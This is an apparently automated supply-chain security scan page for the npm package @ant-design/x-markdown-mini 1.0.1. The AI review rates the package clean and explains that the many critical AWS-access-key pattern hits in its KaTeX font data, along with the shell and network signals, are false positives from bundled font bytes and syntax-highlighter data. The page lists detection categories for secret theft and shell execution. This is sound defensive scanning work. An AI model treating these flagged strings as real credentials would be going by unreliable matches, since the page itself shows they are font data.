registry  /  @ant-design/x-markdown-mini  /  1.0.1

@ant-design/x-markdown-mini@1.0.1

多小程序场景下的高性能、强扩展、流式友好的 Markdown 渲染器

AI Security Review

scanned 1h ago · by lpm-firewall-ai

No confirmed malicious attack surface was found. The package is a mini-program Markdown renderer with optional KaTeX and code-highlight plugins; suspicious scanner hits map to bundled renderer/parser data and metadata.

Static reason
One or more suspicious static signals were detected.; previous stored version diff introduced dangerous source
Trigger
Import or user-invoked markdown rendering/plugin use.
Impact
Renders user-provided markdown; no credential access, exfiltration, persistence, or install-time mutation observed.
Mechanism
Markdown tokenization and mini-program node rendering.
Rationale
Static source inspection found no lifecycle hooks or concrete malicious behavior; the highlighted network/secret/execution signals are package-aligned markdown, font, KaTeX, and highlight.js artifacts. Mark clean because there is no unconsented install-time action, exfiltration, remote payload loading, or destructive behavior.
Evidence
package.jsonindex.jsindex.mjskatex-font-data.jsplugins/CodeHighlight/index.jsplugins/Latex/index.js

Decision evidence

public snapshot
AI called this Clean at 94.0% confidence as Benign with low false-positive risk.
Evidence for block
  • index.js mutates Array/String .at polyfills at import time, but only local JS built-ins.
  • plugins/CodeHighlight/index.js contains shell command names in bundled Bash syntax highlighter data, not executed code.
  • katex-font-data.js embeds base64 KaTeX TTF font data; secret-looking strings are font bytes/license text.
Evidence against
  • package.json has no preinstall/install/postinstall scripts and no bin entry.
  • index.js/index.mjs export markdown parsing/rendering APIs based on marked and platform renderers.
  • No child_process, fs file writes/reads, process.env harvesting, eval/new Function, or network request APIs found in runtime entrypoints.
  • Network strings are README/package metadata, markdown URL parsing, or http-to-https image normalization, not outbound calls.
  • plugins/Latex and plugins/CodeHighlight are bundled KaTeX/highlight.js style renderers invoked by user configuration.
Behavioral surface
Source
ChildProcessNetworkShell
Supply chain
HighEntropyStringsMinifiedUrlStrings
ManifestNo manifest risk signals triggered.
scanned 21 file(s), 3.77 MB of source, external domains: cdn.jsdelivr.net, docs.python.org, en.wikibooks.org, github.com, spec.commonmark.org, tc39.es, tex.stackexchange.com, www.w3.org, yaml.org

Source & flagged code

20 flagged · loading source
katex-font-data.jsView file
5patternName = aws_access_key severity = critical line = 5 matchedText = "KaTeX_A...8=",
Critical
Critical Secret

Package contains a critical-looking secret pattern.

katex-font-data.jsView on unpkg · L5
5patternName = aws_access_key severity = critical line = 5 matchedText = "KaTeX_A...8=",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L5
7patternName = aws_access_key severity = critical line = 7 matchedText = "KaTeX_C...8=",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L7
11patternName = aws_access_key severity = critical line = 11 matchedText = "KaTeX_M...==",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L11
14patternName = aws_access_key severity = critical line = 14 matchedText = "KaTeX_M...8=",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L14
16patternName = aws_access_key severity = critical line = 16 matchedText = "KaTeX_S...AP",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L16
17patternName = aws_access_key severity = critical line = 17 matchedText = "KaTeX_S...8=",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L17
20patternName = aws_access_key severity = critical line = 20 matchedText = "KaTeX_S...AP",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L20
23patternName = aws_access_key severity = critical line = 23 matchedText = "KaTeX_S...8=",
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L23
24patternName = aws_access_key severity = critical line = 24 matchedText = "KaTeX_T...w=="
Critical
Secret Pattern

AWS access key ID in katex-font-data.js

katex-font-data.jsView on unpkg · L24
index.jsView file
matchType = previous_version_dangerous_delta matchedPackage = @ant-design/x-markdown-mini@1.0.0 matchedIdentity = npm:[redacted]:1.0.0 similarity = 0.857 summary = stored previous version shares package body but lacks this dangerous source file
High
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

index.jsView on unpkg
miniprogram_dist/katex-font-data.jsView file
5patternName = aws_access_key severity = critical line = 5 matchedText = "KaTeX_A...8=",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L5
7patternName = aws_access_key severity = critical line = 7 matchedText = "KaTeX_C...8=",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L7
11patternName = aws_access_key severity = critical line = 11 matchedText = "KaTeX_M...==",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L11
14patternName = aws_access_key severity = critical line = 14 matchedText = "KaTeX_M...8=",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L14
16patternName = aws_access_key severity = critical line = 16 matchedText = "KaTeX_S...AP",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L16
17patternName = aws_access_key severity = critical line = 17 matchedText = "KaTeX_S...8=",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L17
20patternName = aws_access_key severity = critical line = 20 matchedText = "KaTeX_S...AP",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L20
23patternName = aws_access_key severity = critical line = 23 matchedText = "KaTeX_S...8=",
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L23
24patternName = aws_access_key severity = critical line = 24 matchedText = "KaTeX_T...w=="
Critical
Secret Pattern

AWS access key ID in miniprogram_dist/katex-font-data.js

miniprogram_dist/katex-font-data.jsView on unpkg · L24

Findings

19 Critical1 High1 Medium2 Low
CriticalCritical Secretkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternkatex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
CriticalSecret Patternminiprogram_dist/katex-font-data.js
HighPrevious Version Dangerous Deltaindex.js
MediumNetwork
LowHigh Entropy Strings
LowUrl Strings